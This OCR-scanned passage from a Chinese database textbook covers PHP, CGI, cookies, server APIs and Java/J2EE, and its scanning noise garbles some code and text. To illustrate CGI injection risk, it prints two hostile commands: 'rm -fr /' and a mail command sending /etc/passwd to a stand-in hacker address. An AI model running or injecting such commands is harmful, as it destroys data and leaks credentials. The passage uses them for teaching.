Linux Web 脚本 语言 。PHP 的 开发 受到 其 他 许多 语言 的 影响 ,包括 Perl、C、Java， 某 种 程 
度 上 也 包括 ASP (参见 29.8.2 节 )， 它 支持 无 类 型 的 变量 并 使 开发 变 得 简单 。 该 语言 的 设计 
目的 是 使 Web 开发 人 员 能 够 快速 编写 动态 产生 的 页 面 。PHP 的 一 个 优点 是 它 的 可 扩展 性 ， 
目前 已 经 提供 了 很 多 可 扩展 的 模型 ， 以 支持 数据 库 互 连 、 邮 件 和 XML 等 。 

当今 流行 的 选择 是 使 用 开放 源码 组 合 ， 包 括 Apache HTTP Server、PHP 和 mySQL 或 
PostgreSQL。 


29.4 公共 网 关 接 口 


| 公共 网 关 接口 (CGI) | 在 Web 服务 器 和 CGI 程序 间 传 输 信 息 的 规范 。 


Web 浏览 器 不 需要 知道 所 请 求 的 文档 的 详细 信息 。 在 提交 请 求 的 URL 后 ， 浏 览 器 只 需 
显示 返回 的 响应 信息 。Web 服务 器 提供 某 种 代码 ， 使 用 MIME 规范 (参见 29.2.1 节 ) 来 使 浏 
览 器 能 够 区 分 不 同 部 分 。 这 使 得 浏览 器 能 显示 图 形 文件 ， 而 必要 时 将 .zip 文件 保存 到 磁盘 。 

Web 服务 器 可 以 智能 地 发 送 文 档 并 告诉 浏览 器 发 送 的 是 哪 种 文档 。 服 务 器 也 可 以 调用 其 
他 应 用 程序 。 当 服务 器 识别 出 URL 指向 某 个 文件 时 ， 它 返回 该 文件 的 内 容 。 男 一 方面 ， 当 
URL 指向 程序 或 脚本 时 ， 它 执行 脚本 并 将 脚本 的 输出 像 文件 那样 发 送 回 浏览 器 。 

CGI 定义 了 脚本 与 Web 服务 器 如 何 通信 (McCool，1993 )。CGI 脚本 是 任何 遵从 CGI 
规范 并 且 被 设计 用 来 接收 和 返回 数据 的 脚本 。 虽 然 从 理论 上 讲 ， 遵 从 CGI 的 脚本 应 该 能 够 
重用 并 独立 于 发 送信 息 的 服务 器 ， 但 是 实际 上 方方面面 的 差异 总 是 会 影响 到 程序 的 可 移植 
性 。 图 29-3 解释 了 CGI 机 制 ， 图 中 Web 服务 器 连接 到 一 个 网 关 ， 通过 网 关 依 次 访问 数据 库 
或 其 他 数据 源 ， 然 后 产生 HTML 传输 给 客户 端 。 





:如 


图 29-3 CGI 环境 
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在 Web 服务 器 启动 脚本 前 ， 它 存储 了 一 些 能 标识 服务 器 当前 状态 的 环境 变量 ， 如 数据 
的 请 求 者 等 信息 。 脚 本 程序 挑选 这 些 信 息 ， 读 取 STDIN (标准 输入 流 )。 然 后 执行 必要 的 处 
理 过 程 ， 并 将 输出 写 到 STDOUT (标准 输出 流 )。 具 体 来 说 ， 脚 本 负责 发 送 MIME 头 信 息 ， 
其 后 是 输出 的 主体 。CGI 脚本 几乎 可 以 用 任何 语言 编写 ， 只 要 它 支 持 操作 系统 环境 变量 的 读 
人 和 读 出 。 这 意味 着 ， 对 UNIX 平台 ,脚本 可 以 用 Perl、PHP、Java 和 C 四 种 或 者 说 是 几乎 
所 有 的 主要 语言 来 编写 。 对 于 基于 Windows 的 平台 ， 脚 本 可 以 用 DOS 批 处 理 文件 编写 ， 或 
者 使 用 Visual Basic、C/C++、Delphi， 甚 至 是 ActivePerl 编写 。 

从 Web 浏览 器 运行 CGI 脚本 对 用 户 来 说 几乎 是 透明 的 ， 这 也 是 它 的 优点 之 一 。CGI 脚 
本 的 成 功 执行 必须 包括 以 下 几 步 : 

(1 ) 用 户 通过 点 击 链接 或 鼠标 按钮 调用 CGI 脚本 。 脚 本 也 可 以 在 浏览 器 载 人 HTML 文 
档 时 被 调用 。 

(2 ) 浏览 器 联系 Web 服务 器 ， 要 求 允 许 运 行 CGI 脚本 。 

(3 ) 服务 器 检查 配置 并 访问 文件 来 确认 请 求 者 是 否 有 权 访 问 CGI 脚本 ， 检 验 CGI 脚本 
是 否 存在 。 

(4 ) 服务 器 准备 环境 变量 ， 启 动 脚本 。 

(5 ) 脚本 执行 并 读 取 环境 变量 和 STDIN。 

(6) 脚本 发 送 正确 的 MIME 头 给 STDOUT， 然 后 发 送 输出 的 剩余 部 分 以 及 终止 符 。 

(7) 服务 器 发 送 数据 给 STDOUT， 然 后 关闭 链接 。 

(8 ) 浏览 器 显示 服务 器 发 送 来 的 信息 。 

可 以 用 不 同 的 方式 将 信息 从 浏览 器 发 送 到 CGI 脚本， 脚本 可 以 用 能 人 的 HTML 标记 返 
回 结果 ， 如 作为 明文 或 者 是 作为 图 像 。 浏 览 器 像 对 其 他 文档 那样 对 结果 作出 解释 。 这 提 
供 了 一 种 非常 有 用 的 机 制 来 访问 具有 编程 接口 的 外 部 数据 库 。 为 了 将 数据 返回 给 浏览 器 ， 
CGI 脚本 返回 一 个 头 作 为 输出 的 第 一 行 ， 这 将 告诉 浏览 器 如 何 显 示 输 出 ， 如 同 在 29.2.1 节 
讨论 的 那样 。 


29.4.1 向 CGI 脚本 传递 信息 


将 信息 从 浏览 器 传递 给 CGI 脚本 有 四 种 主要 的 方式 : 

e 在 命令 行 传递 参数 。 

e 传递 环境 变量 给 CGI 程序 。 

e 通过 标准 输出 传送 数据 给 CGI 程序 。 

e 使 用 附加 的 路 径 信息 。 

本 节 简 要 分 析 前 面 两 种 方法 。 有 兴趣 的 读者 可 以 参考 本 书 “ 深 入 阅读 ”部 分 中 本 章 参考 
文献 以 获得 关于 CGI 的 进一步 信息 。 

在 命令 行 传递 参数 

HTML 语言 提供 了 ISINDEX 标记 来 发 送 命令 行 参数 给 CGI 脚本 。 此 标记 应 当 被 放置 在 
HTML 文档 的 <HEAD> 部 分 ， 可 以 告诉 浏览 器 在 Web 页 面 上 创建 字段 来 支持 关键 字 的 输入 
和 搜索 。 然 而 使 用 这 种 方式 的 唯一 方法 是 让 CGI 脚本 用 内 入 式 标记 <ISINDEX> 自己 生成 
HTML 文档 ， 并 生成 关键 字 的 搜索 结果 。 

使 用 环境 变量 传递 参数 

将 数据 传递 给 CGI 脚本 的 另外 一 种 方式 是 使 用 环境 变量 。 服 务 器 在 调用 CGI 脚本 时 自动 
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设置 环境 变量 。 有 几 种 可 以 使 用 的 环境 变量 ， 但 是 在 数据 库 上 下 文中 最 常用 的 是 QUERY_ 
STRING。HTML 表格 中 使 用 GET 方法 设置 QUERY _ STRING 环境 变量 (参见 29.2.1 节 )。 
字符 串 包 含 用 户 在 HTML 表格 中 指定 的 数据 连接 编码 。 例 如 ， 用 图 29-4a 所 示 的 HTML 表 
格 数 据 ， 当 点 击 图 29-4b 所 示 的 LOGON 按钮 时 将 会 产生 下 列 URL (假设 Password 字段 包 
含 文本 字符 串 TMCPASS): 
http://www.dreamhome.co.uk/cgi-bin/quote.pl?symboll=Thomas+Connolly&symbol2=TMCPASS 





‘<FORM METHOD = “GET" ACTION = "http://www reamhome.co sol 
Name:<INPUT TYPE = "text NAME = "symboll” SIZE = 15><BR> ， 
«Password:<INPUT TYPE = "password" NAME = rbot Gian fn i 
<INPUT TYPE = "submit" Value = "LOGON"> 
<INPUT TYPE = "reset" Value = "CLEAR"></FORM> 


a) 部 分 HTML 表 格 说 明 








| 从 "7 国 7 名 时 Page Sey Tookv 各 "| 





和 pn ee he 
图 29-4 


相应 的 QUERY_STRING 包含 : 

symboll=Thomas+Connolly&symbol2=TMCPASS 

使 用 “ &” 字 符 和 特殊 字符 (例如 用 “十 ”来 取代 空格 ) 可 以 将 名 一 值 对 (被 转换 为 字 
符 串 ) 连接 在 一 起 。CGI 脚本 可 以 解码 QUERY_STRING 并 使 用 需要 的 信息 。 


29.4.2 CGI 的 优 缺 点 


CGI 是 Web 服务 器 扩展 应 用 程序 事实 上 的 标准 ， 可 能 仍然 是 Web 应 用 程序 和 数据 源 
交互 的 最 常用 方法 。CGI 的 概念 产生 于 最 初 的 Web 开发 中 ， 为 了 满足 在 Web 服务 器 和 用 户 
自 定义 的 服务 器 应 用 间 提 供 公 共 接 口 的 需要 。CGI 的 主要 优点 是 它 的 简单 性 、 语 言 无 关 性 、 
Web 服务 器 无 关 性 ， 以 及 已 广 为 接 受 。 此 外 ,CGI 程序 是 可 伸缩 的 ， 既 可 以 完成 简单 的 任务 ， 
也 可 以 实现 复杂 的 功能 ， 如 购物 车 与 数据 库 的 交互 。 尽 管 有 这 些 优点 ， 基 于 CGI 的 方法 仍 
存在 一 些 普遍 性 问题 。 
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第 一 个 问题 是 客户 和 数据 库 服 务 器 间 的 通信 必须 通过 中 间 的 Web 服务 器 ， 这 可 能 在 大 
量 用 户 并 发 访问 Web 服务 器 时 导致 瓶颈 。 对 于 每 个 Web 客户 提交 的 请 求 或 是 每 个 数据 库 服 
务 器 发 送 的 响应 ，Web 服务 器 必须 要 在 数据 和 HTML 文档 间 进 行 转换 。 这 当然 会 大 大 加 重 
查询 处 理 的 负载 。 

第 二 个 问题 是 基于 CGI 的 方案 缺乏 对 效率 和 事务 的 支持 ， 这 是 由 于 它 继承 了 HTTP 协 
议 的 无 状态 特性 。 对 于 每 个 通过 CGI 提交 的 请 求 ， 数 据 库 服务 器 必须 执行 同样 的 登录 和 退 
出 过 程 ， 即 使 是 同一 个 用 户 提 交 的 后 继 操 作 也 是 一 样 。CGI 脚本 可 以 支持 查询 的 批 处 理 模 式 ， 
但 是 对 包含 多 个 交互 查询 的 联机 数据 库 事务 的 处 理 则 比较 困难 。 

HTTP 的 无 状态 特性 也 导致 了 更 加 底层 的 问题 如 验证 用 户 输入 。 例 如 ， 如 果 用 户 提交 表 
格 时 ， 某 个 要 求 必 填 的 字段 空 着 ，CGI 脚本 无 法 显示 警告 框 并 拒绝 接受 该 输入 。 脚 本 程序 只 
有 下 面 两 种 选择 : 

e 输出 警告 信息 并 让 用 户 点 击 浏览 器 的 回 退 键 。 

e 再 次 输出 整个 表格 ， 但 把 用 户 已 填写 的 所 有 信息 显示 出 来 ， 让 用 户 改正 错误 或 者 添 

加 新 的 信息 。 

有 几 种 方法 解决 这 个 问题 ， 但 是 没有 一 个 能 足够 令 人 满意 。 一 种 方法 是 维持 一 个 所 有 用 
户 的 最 近 信 息 的 文件 。 当 新 的 请 求 到 来 时 ， 在 文件 中 查找 用 户 ， 然 后 假设 用 户 上 次 输入 的 信 
息 应 该 是 正确 的 程序 状态 信息 。 这 种 方法 的 问题 是 非常 难于 识别 不 同 的 Web 用 户 ， 用 户 可 
能 由 于 某 些 原因 没有 完成 操作 就 退出 ， 一 段 时 间 之 后 又 再 次 访问 。 

由 于 服务 器 必须 为 每 一 个 CGI 脚本 生成 一 个 新 的 进程 或 线程 ， 这 产生 了 另外 一 个 重要 
的 缺点 。 对 于 一 个 很 受 欢 迎 的 网 站 ， 很 有 可 能 同时 并 发 数 十 个 访问 ， 这 可 能 导致 严重 的 过 
载 ， 各 进程 将 争夺 内 存 、 磁 盘 和 处 理 器 时 间 。 脚 本 开发 者 需要 考虑 可 能 会 同时 执行 多 份 脚本 
副本 ， 因 此 就 要 允许 对 正在 使 用 的 数据 文件 的 并 发 访问 。 

最 后 ， 如 果 没 有 采取 适当 的 措施 ， 安 全 问题 就 将 成 为 CGI 的 一 个 重要 缺点 。 很 多 这 些 
问题 都 和 用 户 在 浏览 器 端 输入 的 数据 有 关 ， 这 是 CGI 脚本 的 开发 者 所 无 法 预料 的 。 例 如 ， 
任何 CGI 脚本 导出 的 shell， 如 system 和 grep 都 是 危险 的 。 设 想 当 恶 意 用 户 输入 一 个 包含 下 
列 命 令 之 一 的 字符 串 会 发 生 什么 情况 : 


rm -fr /删除 系统 的 所 有 文件 
mail hacker@hacker.com </etc/passwd // 将 系统 口令 文件 发 送 给 黑客 


某 些 缺 点 可 以 用 本 章 后 面 将 要 提 到 的 技术 加 以 改进 。 


29.5 HTTP Cookie 


一 种 使 CGI 脚本 变 得 更 加 具有 可 交互 性 的 方法 是 使 用 cookie。cookie 是 服务 器 存储 在 
客户 端的 信息 。 存 放 在 cookie 中 的 信息 来 自 服务 器 ， 是 服务 器 对 HTTP 请 求 响应 的 一 部 分 。 
客户 端 在 任意 给 定时 间 内 可 能 有 许多 cookie， 每 一 个 与 一 个 特定 的 网 站 或 网 页 相 联系 。 每 次 
客户 访问 网 站 / 网 页 的 时 候 ， 浏 览 器 把 cookie 和 HTTP 请 求 打包 在 一 起 。Web 服务 器 就 可 以 
使 用 cookie 中 的 信息 来 识别 用 户 ， 并 且 根 据 收集 的 信息 的 属性 个 性 化 网 页 的 外 观 。Web 服 
务 器 可 以 在 返回 cookie 前 添加 或 改变 cookie 内 的 信息 。 

所 有 的 cookie 都 有 过 期 日 期 。 如 果 cookie 的 过 期 日 期 被 显 式 设 置 到 未 来 的 某 个 时 间 ， 
浏览 器 将 会 自动 将 cookie 保存 到 客户 的 硬盘 。 没 有 显 式 指定 过 期 日 期 的 cookie 将 在 浏览 器 
关闭 时 被 从 硬盘 中 删除 。 
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由 于 cookie 和 每 个 新 的 请 求 一 起 被 发 送 回 服务 器 ， 它 们 成 为 一 种 识别 来 自 同 一 用 户 的 
一 系列 请 求 的 有 效 机 制 。 当 收 到 来 自 一 个 已 知 用 户 的 请 求 时 ， 可 以 从 cookie 中 得 到 唯一 标 
识 符 ， 并 使 用 标识 符 从 客户 数据 库 中 获取 额外 信息 。 当 收 到 的 请 求 没有 附加 cookie， 或 者 附 
加 的 cookie 不 包含 必要 的 标识 符 时 ， 就 假设 请 求 来 自 于 新 的 用 户 ， 在 响应 发 送 回 客户 端 之 

前 产生 新 的 标识 符 ， 然 后 把 新 的 信息 加 入 服务 器 的 用 户 数据 库 。 

可 以 使 用 cookie 来 存储 注册 信息 或 个 人 爱好 等 信息 ， 例 如 虚拟 购物 车 应 用 。 用 户 名 
和 口令 可 以 存储 在 cookie 中 ， 这 样 当 用 户 再 次 使 用 数据 库 时 ， 脚本 就 可 以 从 客户 端 获 取 
cookie 并 读 取 先前 指定 的 用 户 名 和 口令 。cookie 的 格式 如 下 : 

Set-Cookie: NAME=VALUE; expires = DATE; path = PATH:; 

[domain = DOMAIN_NAME; secure] 

图 29-5 中 所 示 的 UNIX shell 脚本 可 以 被 用 来 发 送 cookie (虽然 用 户 名 和 口令 数据 通常 
应 以 某 种 方式 加 密 )。 注 意 不 是 所 有 的 浏览 器 都 支持 cookie， 一些 浏览 器 可 能 阻止 部 分 或 是 
所 有 网 站 在 本 地 硬盘 上 存储 cookie。 


$l/bin/sh 

echo "Content- -type: text/html" 

echo "Set-cookie: UserID=conn-ci0; expires = Friday 30- aa 12:00:00 GMT 
echo "Set-cookie: Password=guest; expires = Friday 30-Apr-09 12:00:00 GMT" 
echo 


29-5 一 个 产生 cookie 的 UNIX shell 脚本 


跟踪 cookies 就 可 以 获取 个 人 长 期 的 历史 浏览 记录 ， 这 将 导致 严重 的 隐私 问题 。 为 此 ， 
美国 和 欧洲 的 立法 人 员 特 别 关注 相关 法 律 的 制定 。2011 年 5 月， 欧盟 通 过 了 一 条 法 令 ， 规 
定 网 站 在 访问 端 留 下 非 必须 cookies 之 前 ， 必 须 使 访问 者 知晓 并 得 到 许可 。 法 令 的 约束 对 象 
包括 欧盟 监管 下 的 所 有 个 人 和 企业 。 无 论 访 问 者 的 国籍 是 什么 ， 也 不 管 被 访问 站 点 的 主机 在 
哪里 ， 任 何 触犯 该 法 令 的 企业 都 将 支付 高 达 50 万 英镑 的 处 罚 。 


29.6 扩展 Web 服务 器 


CGI 是 一 种 标准 的 、 可 移植 的 、 组 件 化 的 方法 ， 人 允许 服务 器 运行 脚本 处 理 客户 请 求 ， 支 
持 根据 不 同 的 应 用 实现 不 同 的 功能 。 尽 管 它 有 许多 优点 ,但 CGI 方法 也 有 它 的 缺点 。 多 数 
缺点 是 和 性 能 及 共享 资源 的 处 理 相 关 的 。 这 来 自 于 这 样 一 个 事实 ，CGI 规范 要 求 服 务 器 执行 
网 关 程 序 ， 并 通过 IPC ( Inter-Process Communication， 进 程 间 通 信 ) 机 制 与 之 进行 通信 。 每 
个 请 求 将 会 导致 一 个 额外 的 系统 进程 ， 这 给 服务 器 增加 了 繁重 的 负担 。 

为 了 克服 这 些 缺 点 ， 许 多 服务 器 提供 了 API (应 用 程序 编程 接口 )， 这 增强 了 服务 器 的 功 
能 ， 改 变 了 服务 器 的 特性 ， 使 得 服务 器 变 得 可 定制 。 这 些 附 加 的 功能 称 为 非 CGI 网 关 ( non- 
CGI gateways)。 这 类 API 主要 有 两 个 ,分 别 是 Microsoft 的 IIS API (ISAPI) 和 Apache Web 
Server API。 为 了 克服 每 个 CGI 脚本 都 需要 创建 一 个 独立 进程 的 缺点 ，API 创建 了 一 套 接口 
以 供 服务 器 端 和 使 用 动态 链接 或 共享 对 象 的 后 台 应 用 程序 使 用 。 程 序 被 作为 服务 器 的 一 部 分 
载 和 人 人， 给 予 后 台 应 用 程序 对 服务 器 的 所 有 IO 操作 功能 的 完全 访问 权 。 此 外 ， 应 用 程序 只 有 
一 份 副 本 能 被 载 人 并 被 服务 器 的 多 个 请 求 所 共享 。 这 有 效 地 扩展 了 服务 器 的 能 力 ， 提 供 了 一 
些 CGI 所 不 具有 的 优点 : 
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e 通过 插入 需要 身份 和 口令 的 认证 层 ， 而 不 是 使 用 Web 浏览 器 自身 的 安全 方法 来 为 网 
页 和 站 点 提供 安全 保证 。 

e 通过 跟踪 输入 输出 信息 增强 了 Web 服务 器 的 日 志 功 能 ， 日 志 储存 的 格式 也 不 再 限于 
Web 服务 器 所 支持 的 那些 类 型 。 

e 可 以 用 Web 服务 器 不 能 做 到 的 方式 为 浏览 客户 提供 服务 。 

这 种 方法 比 CGI 复杂 得 多 ， 可 能 需要 程序 员 对 Web 服务 器 和 多 线程 、 并 行 同步 、 网 络 
协议 、 蜡 常 处 理 等 编程 技术 有 深刻 的 理解 。 然 而 它 可 以 提供 非常 灵活 和 强 有 力 的 解决 方案 。 
API 扩 展 可 以 提供 和 CGI 程序 同样 的 功能 ， 但 是 由 于 API 是 作为 服务 器 的 一 部 分 运行 的 ， 
API 方式 的 效率 比 CGI 要 高 得 多 。 

扩展 Web 服务 器 是 存在 潜在 危险 性 的 ， 由 于 改变 了 服务 器 的 正常 执行 ， 可 能 会 引入 错 
误 (bug)。 一 些 API 有 防止 这 种 事件 发 生 的 安全 机 制 。 但 是 如 果 API 扩展 错误 地 改写 了 服务 
器 私有 数据 ， 这 将 很 可 能 会 导致 服务 器 崩溃 。 

与 服务 器 API 相关 的 问题 不 止 包括 复杂 性 和 可 靠 性 。 使 用 这 种 机 制 的 主要 缺点 是 不 可 
移植 性 。CGI 脚本 可 以 方便 地 被 移植 到 所 有 遵守 CGI 规范 的 服务 器 上 。 而 服务 器 API 和 其 
体系 结构 都 是 专 有 的 ， 一 旦 使 用 这 样 的 API， 服 务 器 的 选择 范围 就 受到 了 限制 。 


CGI 和 API 的 比较 


CGI 和 API 所 完成 的 功能 是 相同 的 ， 都 是 扩展 Web 服务 器 的 能 力 。CGI 脚本 运行 在 
Web 服务 器 程序 创建 的 环境 中 。 服 务 器 以 环境 变量 的 形式 为 CGI 脚本 创建 特殊 的 信息 ， 并 
期 望 CGI 脚本 在 运行 时 给 出 回应 。 重 要 的 是 ， 这 些 脚本 可 以 用 任何 语言 编写 ， 只 通过 一 个 
或 更 多 变量 与 服务 器 通信 。 它 仅 在 服务 器 解释 客户 端 请 求 时 执行 ， 并 把 结果 返回 给 服务 器 。 
换 句 话说，CGI 程 序 仅 从 服务 器 获取 信息 并 返回 给 服务 器 。 由 Web 服务 器 程序 负责 将 信息 
发 送 回 浏览 器 。 

API 的 功能 不 限于 通信 。 基 于 API 的 程序 可 以 在 服务 器 处 理 之 前 直接 跟从 浏览 器 来 的 
信息 交互 ， 它 也 可 以 获取 服务 器 发 送 给 浏览 器 的 信息 ， 中 途 截取 这 些 信息 ， 然 后 将 信息 重 定 
向 发 回 浏览 器 。 它 跟 CGI 一 样 也 可 以 根据 服务 器 的 请 求 执行 操作 。 例 如 允许 Web 服务 器 对 
各 种 不 同 的 信息 采取 措施 。Web 服务 器 一 般 发 送 传统 的 HTTP 响应 头 给 浏览 器 ， 但 是 通过 
API， 辅 助 服务 器 工作 的 程序 可 以 完成 部 分 工作 ， 并 把 其 他 请 求 交 给 服务 器 来 处 理 ， 也 可 以 
修改 响应 头 来 支持 其 他 种 类 的 信息 。 

此 外 ， 基 于 API 的 扩展 程序 被 装载 到 Web 服务 器 的 同一 地 址 空间 。 而 CGI 则 是 为 每 个 
单独 的 请 求 创建 一 个 隔离 的 进程 空间 。 因 而 API 提供 了 更 好 的 性 能 ， 消 耗 的 内 存 也 更 少 。 


29.7 Java 


Java 是 Sun Microsystems (已 被 Oracle 公司 并 购 ) 开发 的 专 有 编程 语言 。 它 原来 是 用 来 
支持 在 联网 机 器 和 肉 人 式 系统 环境 下 开发 应 用 程序 的 编程 语言 。 直 到 Internet 和 Web 开始 普 
及 ，Java 才 发 挥 出 它 的 潜力 。Java 很 快 成 为 Web 计算 的 事实 上 的 标准 。 

最 近 几 年 里 ，Java 语言 和 其 相关 技术 的 重要 性 越 来 越 明 显 。Java 是 一 个 类 型 安全 的 、 面 
向 对 象 的 编程 语言 ， 它 对 于 开发 Web 应 用 (applet) 和 服务 器 端 应 用 ( servlet) 是 非常 有 效 
的 。Java 越 来 越 受 关注 ， 由 于 它 类 似 于 C 和 C++ 并且 受 到 工业 界 广泛 的 支持 ， 因 而 许多 组 
织 都 推荐 使 用 Java 语言 。Java 是 一 个 简单 、 面 向 对 象 、 分 布 式 、 解 释 型 、 健 壮 、 安 全 、 中 
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立 、 可 移植 、 高 性 能 、 多 线程 的 动态 语言 (Sun，1997 )。 

Java 体系 结构 

Java 由 于 其 与 目标 机 器 无 关 的 体系 结构 Java 虚拟 机 ( Java Virtual Machine, JVM) 
而 特别 受 人 们 关注 。 因 此 Java 经 常 被 称 为 “只 写 一 次 ， 随 处 运行 ”的 编程 语言 。Java 环境 
如 图 29-6 所 示 。Java 编译 器 读 人 人“.java” 文 件 ， 产 生 “.class ”文件 ,“ .class ”文件 包含 与 
具体 计算 机 体系 结构 无 关 的 字 节 码 指令 。 这 些 字 节 码 易 于 在 任何 平台 上 解释 ， 也 可 以 很 容易 
地 翻译 为 本 地 方法 。JVM 可 以 在 任何 移植 了 解释 器 和 运行 时 系统 的 平台 上 直接 解释 并 执行 
Java 字 节 码 。 由 于 几乎 所 有 的 Web 浏览 器 供应 商都 已 经 取得 了 Java 许可 证 并 实现 了 般 入 式 
的 JVM，Java 应 用 程序 目前 可 以 配置 在 大 多 数 的 终端 用 户 平 台 上 。 








图 29-6 Java 平台 


在 Java 应 用 程序 可 被 执行 之 前 ， 它 将 首先 被 载 人 内 存 中 。 这 是 由 类 加 载 器 完成 的 ， 它 
读 入 包含 字 节 码 的 “.class” 文 件 并 传输 到 内 存 中 。 类 文件 可 以 来 自 本 地 硬盘 或 者 从 网 络 上 
下 载 。 最 后 ， 字 节 码 必须 被 校 验 以 保证 它们 是 有 效 的 ， 且 不 会 违反 Java 的 安全 限制 。 

不 严格 地 说 ，Java 就 是 一 个 安全 的 C++。 它 的 安全 特性 包括 强壮 的 静态 类 型 检查 、 隐 
式 存储 管理 ， 即 通过 使 用 无 用 单元 自动 回收 的 方式 实现 动态 分 配 空间 的 去 配 ， 以 及 在 语言 级 
去 除了 机 器 指针 。 这 些 特性 结合 起 来 就 使 Java 中 不 再 有 C/C++ 中 由 于 错误 使 用 指针 而 带 来 
的 许多 问题 。 这 些 安全 特性 集中 围绕 着 Java 的 一 个 主要 设计 目标 : 具有 在 Internet 上 安全 传 
输 代码 的 能 力 。 安 全 性 也 是 Java 设计 必 不 可 少 的 一 部 分 。 人 们 用 沙 箱 (sandbox ) 来 比喻 它 。 
沙 箱 确 保 不 信任 的 、 恶 意 的 应 用 程序 不 能 访问 系统 资源 。20.5.8 节 已 经 讨论 了 Java 安全 性 。 

Java 2 平台 

当 Java 作为 研究 成 果 面 世 后 ，Sun 推出 了 Java 开发 工具 箱 (Java Development Kit，JDK)， 
包括 编译 器 和 运行 时 系统 ， 该 工具 箱 可 以 通过 Internet 免费 下 载 。JDK 1.0 是 在 1996 年 初 推 
出 的 ，JDK 1.1 则 是 在 1997 年 2 月 发 布 。 不 久 后 Sun 就 宣布 将 着 手 构 建 一 个 企业 级 的 Java 
平台 (JPE)， 由 一 系列 标准 Java 的 扩展 即 企业 级 Java API 组 成 。 企 业 级 Java 平台 的 目标 是 
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为 中 间 件 供应 商 提供 一 个 分 布 式 应 用 的 标准 化 执行 环境 ， 或 在 它们 现 有 的 中 间 件 解决 方案 之 
上 构建 ， 或 作为 新 产品 的 一 部 分 。 此 方案 所 具有 的 这 些 优点 将 允许 应 用 程序 开发 者 开发 平台 
中 立 和 供应 商 中 立 的 解决 方案 。 
然而 , JPE 开发 平台 还 有 一 些 问题 ， 例 如 没有 办 法 测试 服务 器 端 平台 是 否 遵守 JPE 规范 。 
API 是 单独 发 展 的 ， 没 有 配置 可 以 确认 。 在 1999 年 中 ，Sun 宣布 它 将 致力 于 一 个 独特 的 集 
成 Java 企业 级 平台 的 开发 ， 其 中 包括 如 下 产品 : 
e J2ME : Java 2 平台 微型 版 。 目 标 为 租 入 式 和 消费 电子 产品 平台 。J2ME 是 一 个 较 小 
的 版 本 ， 仅 包含 那些 嵌入 式 系 统 需要 的 API。 
e J2SE : Java 2 平台 标准 版 。 目 标 为 典型 的 桌面 系统 和 工作 站 环境 。J2SE 是 J2EE 和 
Java Web 服务 的 基础 。 
e J2EE: Java 2 平台 企业 版 。 目 标 为 健壮 的 、 可 伸缩 的 、 多 用 户 的 和 安全 的 企业 应 用 。 
JDK 发 行 第 5 版 时 取消 了 平台 名 称 中 的 “2”。JEE(Java Enterprise Edition ,Java 企业 版 ) 
的 设计 旨 在 简化 在 多 用 户 企业 应 用 中 开发 、 配 置 和 管理 等 复杂 问题 。JEE 是 Sun 所 领导 的 一 
个 开放 的 工业 标准 ， 合 作 的 供应 商 包括 IJBM、Oracle 和 BEA 等 公司 ， 这 些 公司 都 在 开发 基 
于 JEE 平 台 的 产品 。JEE 的 基石 是 EJB ( Enterprise JavaBean， 企 业 级 JavaBean)， 它 是 开发 
Java 服务 器 端 组 件 的 一 个 标准 。 
JEE 的 完整 讨论 超出 了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参考 本 书 的 “深入 阅读 ”部 分 
来 获得 进一步 的 信息 。 本 节 将 集中 讨论 两 个 主要 的 JEE 组 件 : JDBC 和 JSP (JavaServer 
Pages)。 为 了 能 了 解 这 些 组 件 相互 如 何 结合 ， 图 29-7 中 提供 了 J2EE 体系 结构 的 简要 介绍 。 
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表现 层 ”在 表现 层 有 一 些 可 选择 的 实现 方式 ， 包 括 基 于 HTML 的 客户 端 、Java applet、Java 
应 用 程序 和 基于 CORBA 的 客户 端 。 基 于 HTML 的 客户 端 可 以 访问 Web 服务 器 的 服务 ， 例 
如 Java servlet 和 JSP (Java servlet 的 特殊 形式 )。 基 于 CORBA 的 客户 端 使 用 CORBA 命 
名 服务 来 定位 业务 层 的 组 件 ， 然 后 使 用 CORBA/ITIOP 调用 这 些 组 件 。 其 他 的 客户 端 使 用 
JNDI ( Java Naming and Directory Interface) 来 定位 业务 层 组 件 并 通过 RMI /TIOP 协议 (Java 
Remote Method Invocation over Internet Inter-ORB Protocol) 跨越 Java 虚拟 机 调用 组 件 方 法 。 
消息 也 可 选择 使 用 Java 消息 服务 (Java Message Service，JMS) 异步 发 送 。 

组 件 、 容 器 和 连接 器 ”JEE 将 应 用 程序 分 为 三 个 基本 部 分 : 组 件 、 容 器 和 连接 器 。 开 发 

者 关注 组 件 ， 而 系统 提供 商 实现 容器 和 连接 器 。 容 器 处 于 组 件 和 连接 器 之 间 并 为 两 者 提供 透 
明 的 服务 ， 如 事务 和 资源 池 。 容 器 对 一 些 组 件 的 行为 在 系统 的 配置 期 就 做 了 定义 ， 而 不 是 放 
在 应 用 程序 的 代码 里 。 连 接 器 处 于 JEE 平 台 之 下 ， 定 义 了 一 系列 API 为 现 有 的 企业 提供 商 
提供 套 接 服务 。 

企业 级 JavaBean 企业 级 JavaBean ( EJB) 是 业务 层 的 服务 器 端 组 件 结构 ， 封 装 业务 

逻辑 和 数据 逻辑 。 在 版 本 2 中 EJB 组 件 主要 有 三 种 类 型 : 

e EJB 会 话 Bean : 实现 业务 逻辑 、 业 务 规则 和 工作 流 的 组 件 。 例 如 ， 会 话 Bean 可 以 
执行 订购 条 目 、 银 行 交 易 、 股 票 控 制 以 及 数据 库 操 作 。 会 话 Bean 的 生存 周期 是 客户 
端的 会 话 周期 ， 每 次 只 能 被 一 个 客户 端 所 使 用 。 

e EJB 消息 驱动 Bean (MDB) : 处 理 来 自 客户 端 、 其 他 EJB 或 JEE 组 件 的 消息 。MDB 
与 事件 接收 器 类 似 ， 不 同 的 是 其 接收 JMS 的 消息 而 非 事 件 。MDB 典型 的 行为 是 : 
从 队列 接收 消息 ， 分 析 其 中 的 请 求 ， 交 给 会 话 Bean 或 实体 Bean 去 响应 请 求 。 

e EJB 实体 Bean : 封装 企业 数据 的 组 件 。 和 会 话 Bean 相 比 ， 实 体 Bean 是 持久 的 (可 
以 比 客户 端的 生命 周期 长 )， 可 以 被 多 个 用 户 所 共享 。 有 两 种 类 型 的 实体 Bean : 

@ 管理 Bean 持久 性 (BMP) 实体 Bean。 它 需要 组 件 开发 者 编写 代码 来 实现 Bean 的 
持久 性 ， 可 用 的 方法 包括 使 用 JDBC 或 SQLJ 等 API (下 面 将 简要 讨论 )， 或 Java 
串 行 化 (在 27.6.1 节 中 已 讨论 )。 也 可 使 用 Oracle 的 TOPLink ( 详 见 29.9 节 ) 或 
